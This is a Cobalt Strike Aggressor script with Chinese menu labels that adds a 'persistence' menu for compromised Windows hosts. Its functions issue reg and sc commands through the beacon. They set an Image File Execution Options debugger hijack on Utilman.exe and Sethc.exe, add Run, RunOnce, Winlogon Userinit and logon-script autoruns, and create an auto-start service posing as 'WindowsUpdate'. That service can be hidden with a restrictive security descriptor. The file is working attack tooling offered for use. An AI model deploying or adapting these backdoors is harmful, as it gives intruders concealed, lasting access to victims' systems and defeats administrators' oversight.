#define functions


sub InstallBackDoor{
    local('$Prefix $File');
    $Prefix = "\"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\";
    $File = replace($3['CallBackFile'], "\"", "");
    if ($3['Type'] eq "Utilman"){
        $Prefix = $Prefix."Utilman.exe\"";
        bshell($bid,"reg add  $+ $Prefix /f");
        bshell($bid,"reg add  $+ $Prefix /v Debugger /t REG_SZ /d \" $+ $File \" /f ");
    }
    else if($3['Type'] eq "Sethc"){
        $Prefix = $Prefix."Sethc.exe\"";
        bshell($bid,"reg add  $+ $Prefix /f");
        bshell($bid,"reg add  $+ $Prefix /v Debugger /t REG_SZ /d \" $+ $File \" /f ");
    }
    
}


sub InstallAutoRun{
    local('$Prefix $File $Key $Item $Reg');
    $Prefix = "\\Software\\Microsoft\\Windows\\CurrentVersion\\";
    $File = replace($3['CallBackFile'], "\"", "");
    $Key = "\"".$3['RegKey'];
    $Item = $3['RegItem']."\"";
    if($3['RegItem'] eq "Winlogon"){
        $Prefix = replace($Prefix,'Windows',"Windows NT");
        $Reg = $Key.$Prefix.$Item;
        bshell($bid,"reg add  $+ $Reg /v Userinit /t REG_SZ /d \" C:\\Windows\\system32\\userinit.exe, $+ $File \" /f ");
    }
    else if($3['RegItem'] eq "Logon Scripts"){
        bshell($bid,"reg add  \"HKCU\\Environment\" /v UserInitMprLogonScript /t REG_SZ /d \" $+ $File \" /f ");
    }
    else{
        $Reg = $Key.$Prefix.$Item;
        bshell($bid,"reg add  $+ $Reg /f");
        bshell($bid,"reg add  $+ $Reg /v Svchost /t REG_SZ /d \" $+ $File \" /f ");
    }
}


sub InstallSchedule{
    
}

sub InstallService{
    local('$Name $Path $Hide_cmd');
    $Name = $3['SerName'];
    $Path = replace($3['Path'], "\"", "");
    $Hide_cmd = "sc sdset  $+  $Name \"D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)\"";
    if ($3['Hide'] eq "true"){
       bshell!($bid, "sc create \" $+ $Name\" binPath= \" $+ $Path\" && sc config \" $+ $Name\" start= auto &&  $+  $Hide_cmd");
    }
    else{
        bshell!($bid, "sc create \" $+ $Name\" binPath= \" $+ $Path\" && sc config \" $+ $Name\" start= auto");
    }
}


#append menus


    menu "权限维持"{
                item "映像劫持"{
                    if (!-isadmin $1['@']){
                        show_error("权限不足!");
                    }
                    else{
                        $bid = $1['@'];
                        $Dialog = dialog("映像劫持",%(Type => "Utilman", CallBackFile => "c:\\Windows\\system32\\cmd.exe",bid => $bid),&InstallBackDoor);
                        dialog_description($Dialog, "使用IFEO安装后门");
                        drow_combobox($Dialog,"Type","类型: ", @("Utilman", "Sethc"));
                        drow_text($Dialog,"CallBackFile","回调文件: ");
                        dbutton_action($Dialog, "运行");
                        dialog_show($Dialog);
                        
                    }
                }

                item "自启动"{
                    if (!-isadmin $1['@']){
                        show_error("权限不足!");
                    }
                    else{
                        $bid = $1['@'];
                        $Dialog = dialog("自启动",%(RegKey => "HKLM", RegItem => "Run", CallBackFile => "C:\\Windows\\system32\\cmd.exe",bid => $bid),&InstallAutoRun);
                        dialog_description($Dialog, "注册表添加开机启动项");
                        drow_combobox($Dialog, "RegKey", "注册表键: ", @("HKLM", "HKCU"));
                        drow_combobox($Dialog, "RegItem", "注册表项: ", @("Run", "RunOnce", "RunOnceEx", "Winlogon", "Logon Scripts"));
                        drow_text($Dialog, "CallBackFile", "回调文件: ");
                        dbutton_action($Dialog, "注册");
                        dialog_show($Dialog);
                    }
                }

                #item "Schedule"{
                #    
                #}


                item "服务注册"{
                    $bid = $1['@'];
                    $Dialog = dialog("服务注册",%(SerName => "WindowsUpdate", Path => "C:\\Windows\\system32\\cmd.exe",bid => $bid),&InstallService);
                    dialog_description($Dialog, "将可执行文件注册为服务");
                    drow_text($Dialog, "SerName", "服务名称: ");
                    drow_text($Dialog, "Path", "程序路径: ");
                    drow_checkbox($Dialog, "Hide", "隐藏服务: ", "");
                    dbutton_action($Dialog, "安装");
                    dialog_show($Dialog);
                }
    }